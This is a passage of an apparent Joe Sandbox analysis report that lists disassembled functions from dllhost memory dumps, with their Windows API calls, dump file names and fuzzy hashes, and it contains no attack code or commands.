Instruction Fuzzy Hash: 5261C336169A45C6F769DB15E490B9BB7A0F38CB88F100116FB8F97BA8DB78C540CB04

Function 000001C0401C5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401C5E66

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: e5e388c6c1f82d27aaa6caf82da39b2db67c55b1d8da5d03a7b589de8dc7d0a7
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 1361C8365A9A80C6F76ADB55E454B5BB7A0F388B48F100119FB8F53BB8DB78C580CB40

Function 000001C0401F3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001C0401F3A5B), ref: 000001C0401F3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401F3A5B), ref: 000001C0401F3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401F3A5B), ref: 000001C0401F3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401F3A5B), ref: 000001C0401F3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401F3A5B), ref: 000001C0401F3F68

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 380ece5ac0d56bd94a10ca91bbe93b6ce71b8feca79b928ae9b2bb2f3524fd11
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: DA115E36A04B42C3FB2ADB21E404A8B67B1FB4DB88F044026DB4D537A4EB7DC944C781

Function 000001C0401C3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001C0401C3A5B), ref: 000001C0401C3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401C3A5B), ref: 000001C0401C3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401C3A5B), ref: 000001C0401C3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401C3A5B), ref: 000001C0401C3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401C3A5B), ref: 000001C0401C3F68

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: e6d56b7c8ba6e817e2c118d995b3df33115c8d731a070cbe67c200a51afde802
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: FA115136A48740C3FB2ADB21E40468A6770FB49F88F04042AEB4E53764EB7DD584C781

Function 000001C0401F8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C0401F8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C0401F8D62
RtlUnwindEx.NTDLL ref: 000001C0401F8DBC

Strings

csm, xrefs: 000001C0401F8D49

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 83b7464449a898e0fd0f008934f7d663bfc7d7143250ddb684bce015a62d668d
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 61518B32351A02CAEB5ADB19E448FAE7791E758F9CF148121AF4B677A9DB78C841C700

Function 000001C0401C8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C0401C8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C0401C8D62
RtlUnwindEx.NTDLL ref: 000001C0401C8DBC

Strings

csm, xrefs: 000001C0401C8D49

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 2c30a42c63118f440b464dd08f420ba0d5bd740ba152934d3b8f99ddc1be5b7b
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 4F51AD32299600CAFB5ADB59E484FAE7791E758F8CF148121EF4B577A8DB78D841C700

Function 000001C0401FAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C0401FAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001C0401FABBC

Strings

csm, xrefs: 000001C0401FAAF6
csm, xrefs: 000001C0401FAC0E

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 828403560b8d5ffa5eb90c8f0ef81898060e23ef55f529551eb4456cfb296f63
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 84518FB2280682CBFB7ACB119544B9A77A0F358F9CF584117DB9A67BA5CB3CC450CB01

Function 000001C0401FA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001C0401FA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001C0401FA7A7

Strings

MOC, xrefs: 000001C0401FA76F
RCC, xrefs: 000001C0401FA777

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 193b9f315d51c90ee0bf5742c46c473fdf5abcbf5733ba988f6bd1c22f78f555
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: FF619072508BC5C5EB26DF15E440BDAB7A0F789B9CF444216EB9923BA9DB7CD190CB00

Function 000001C03F6E9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C03F6E9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001C03F6E9FBC

Strings

csm, xrefs: 000001C03F6E9EF6
csm, xrefs: 000001C03F6EA00E

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 6905e8a1cc13955225baf9daa129cebda59b2db0ebc66af4ae803919cfec0979
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: D4516A3B3842C1CEFB658F219644BDC77A8FB69B98F146199DAC947B95CB38C450CB01

Function 000001C0401CAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C0401CAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001C0401CABBC

Strings

csm, xrefs: 000001C0401CAAF6
csm, xrefs: 000001C0401CAC0E

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 887bd0989c8916d6ed0741fd63f061286751a1d6b61b727a4da8727681f0ecbb
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F8515A322C8680CAFB6BCF21A544B9A77A1F358F9CF544116DB8A67BA5CB3CD850C705

Function 000001C0401CA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001C0401CA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001C0401CA7A7

Strings

MOC, xrefs: 000001C0401CA76F
RCC, xrefs: 000001C0401CA777

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: b3268baa8a35be18903fdba8d21d691fdbfe15bb780c02335895c060a13bd70e
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: A9615C72548BC4C5FB26DB15E441BDAB7A0F789B9CF444216EB9923BA5DB7CC190CB00

Function 000001C0401F3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001C0401F3972
StrStrW.SHLWAPI ref: 000001C0401F3990
StrToIntW.SHLWAPI ref: 000001C0401F39B7

Part of subcall function 000001C0401F1A30: OpenProcess.KERNEL32 ref: 000001C0401F1A56
Part of subcall function 000001C0401F1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401F1A74
Part of subcall function 000001C0401F1A30: PathFindFileNameW.SHLWAPI ref: 000001C0401F1A83
Part of subcall function 000001C0401F1A30: lstrlenW.KERNEL32 ref: 000001C0401F1A8F
Part of subcall function 000001C0401F1A30: StrCpyW.SHLWAPI ref: 000001C0401F1AA2
Part of subcall function 000001C0401F1A30: CloseHandle.KERNEL32 ref: 000001C0401F1AB0

Part of subcall function 000001C0401F3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401F272F), ref: 000001C0401F3FA0

Strings

pid_, xrefs: 000001C0401F3968

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 38213a376150e604a8d941ae6d985805ae48bde4c996c5e16f2e29d80ce1bf1b
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 12117271350782D1FB1ADB25E9047DBA6A4B78CB88F9041259F8EE36E4EF68C905C700

Function 000001C0401C3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001C0401C3972
StrStrW.SHLWAPI ref: 000001C0401C3990
StrToIntW.SHLWAPI ref: 000001C0401C39B7

Part of subcall function 000001C0401C1A30: OpenProcess.KERNEL32 ref: 000001C0401C1A56
Part of subcall function 000001C0401C1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401C1A74
Part of subcall function 000001C0401C1A30: PathFindFileNameW.SHLWAPI ref: 000001C0401C1A83
Part of subcall function 000001C0401C1A30: lstrlenW.KERNEL32 ref: 000001C0401C1A8F
Part of subcall function 000001C0401C1A30: StrCpyW.SHLWAPI ref: 000001C0401C1AA2
Part of subcall function 000001C0401C1A30: CloseHandle.KERNEL32 ref: 000001C0401C1AB0

Part of subcall function 000001C0401C3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401C272F), ref: 000001C0401C3FA0

Strings

pid_, xrefs: 000001C0401C3968

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 0ef42eb90b27bbf8d821d14ae7985bf9f8c9f344bd5b9fb0b2e84112d588fff9
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 411178313D8781D1FB29DB25E8007DB53A4BB4CB88F8044259B8BE36A4EF68C915C700

Function 000001C040201FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001C040202027
WriteFile.KERNEL32 ref: 000001C040202304
WriteFile.KERNEL32 ref: 000001C04020234A
GetLastError.KERNEL32 ref: 000001C040202409

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 202ec8edbc16b81c7cd4ddd32aede96a8d3d0f911aa7545f000f763fa02a3334
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: BAD18632754B94CAF716CBA9D940ADE37B1E358B9CF404216DF5EA7B99DA34C10AC340

Function 000001C0401D1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001C0401D2027
WriteFile.KERNEL32 ref: 000001C0401D2304
WriteFile.KERNEL32 ref: 000001C0401D234A
GetLastError.KERNEL32 ref: 000001C0401D2409

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f8caeea903b3eff039f4698a5c78994342e74f4bda8145843af2e3cfe25a4e5e
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: C4D1A832754A80C9F716CBA9D440ADE37B1FB68B9CF504216DF6AA7BA9DA34D106C340

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744

Function 000001C0401F14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401F14C6
HeapFree.KERNEL32 ref: 000001C0401F14D5
GetProcessHeap.KERNEL32 ref: 000001C0401F14E2
HeapFree.KERNEL32 ref: 000001C0401F14F1
GetProcessHeap.KERNEL32 ref: 000001C0401F1501

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: d905a34df13ecc53adc70084680e99b9d109fc894b0984ba2b801d86c1c22060
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 05016D32650B91DAE719EF66E90469AB7A0F78DF84B054025DF4D63764DF38D051C740

Function 000001C0401C14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401C14C6
HeapFree.KERNEL32 ref: 000001C0401C14D5
GetProcessHeap.KERNEL32 ref: 000001C0401C14E2
HeapFree.KERNEL32 ref: 000001C0401C14F1
GetProcessHeap.KERNEL32 ref: 000001C0401C1501

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 801005784ed22b8cc0facadef43b51b1fe6e8d5bb79048439a1e756072adcc7c
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 14012D32654B90DAE719EF66E80468A77B1FB8CF85B054025DF5B63724DF38E451C740

Function 000001C0402028F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

